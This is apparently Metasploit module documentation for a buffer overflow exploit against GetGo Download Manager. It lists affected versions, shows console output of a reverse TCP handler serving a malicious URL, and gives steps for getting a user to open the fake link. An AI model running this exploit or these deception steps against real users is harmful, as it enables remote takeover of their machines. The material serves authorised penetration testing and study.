## Description

This module adds a buffer overflow exploit for GetGo Download Manager. It supports versions
4.9.0.1982 and 5.3.0.2712. Prior versions should also be vulnerable.

This exploit has been tested on Windows XP SP3. The vulnerable software can be downloaded
at [GetGo Download Manager 5.3.0.2712](https://www.exploit-db.com/apps/b26d82eadef93531f8beafac6105ef13-GetGoDMSetup.exe).

To use this, first start the module as in the following example:

```
msf5 exploit(windows/browser/getgodm_http_response_bof) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.0.12:4444
msf5 exploit(windows/browser/getgodm_http_response_bof) > [*] Using URL: http://0.0.0.0:8080/shakeitoff.mp3
[*] Local IP: http://192.168.0.12:8080/shakeitoff.mp3
[*] Server started.
```

The exploit should give you a fake link. Pass this link to the GetGo user, and instruct them to
do the following:

1. Start GetGo Download Manager.
2. Click on the DOWNLOAD button.
3. Click on New. If the link is already copied to the clipboard, clicking on this should trigger
   the download, and the user gets exploited.
4. If the link isn't in the clipboard, instruct the user to enter the URL in the URL field and
   click OK. The user should also get exploited this way.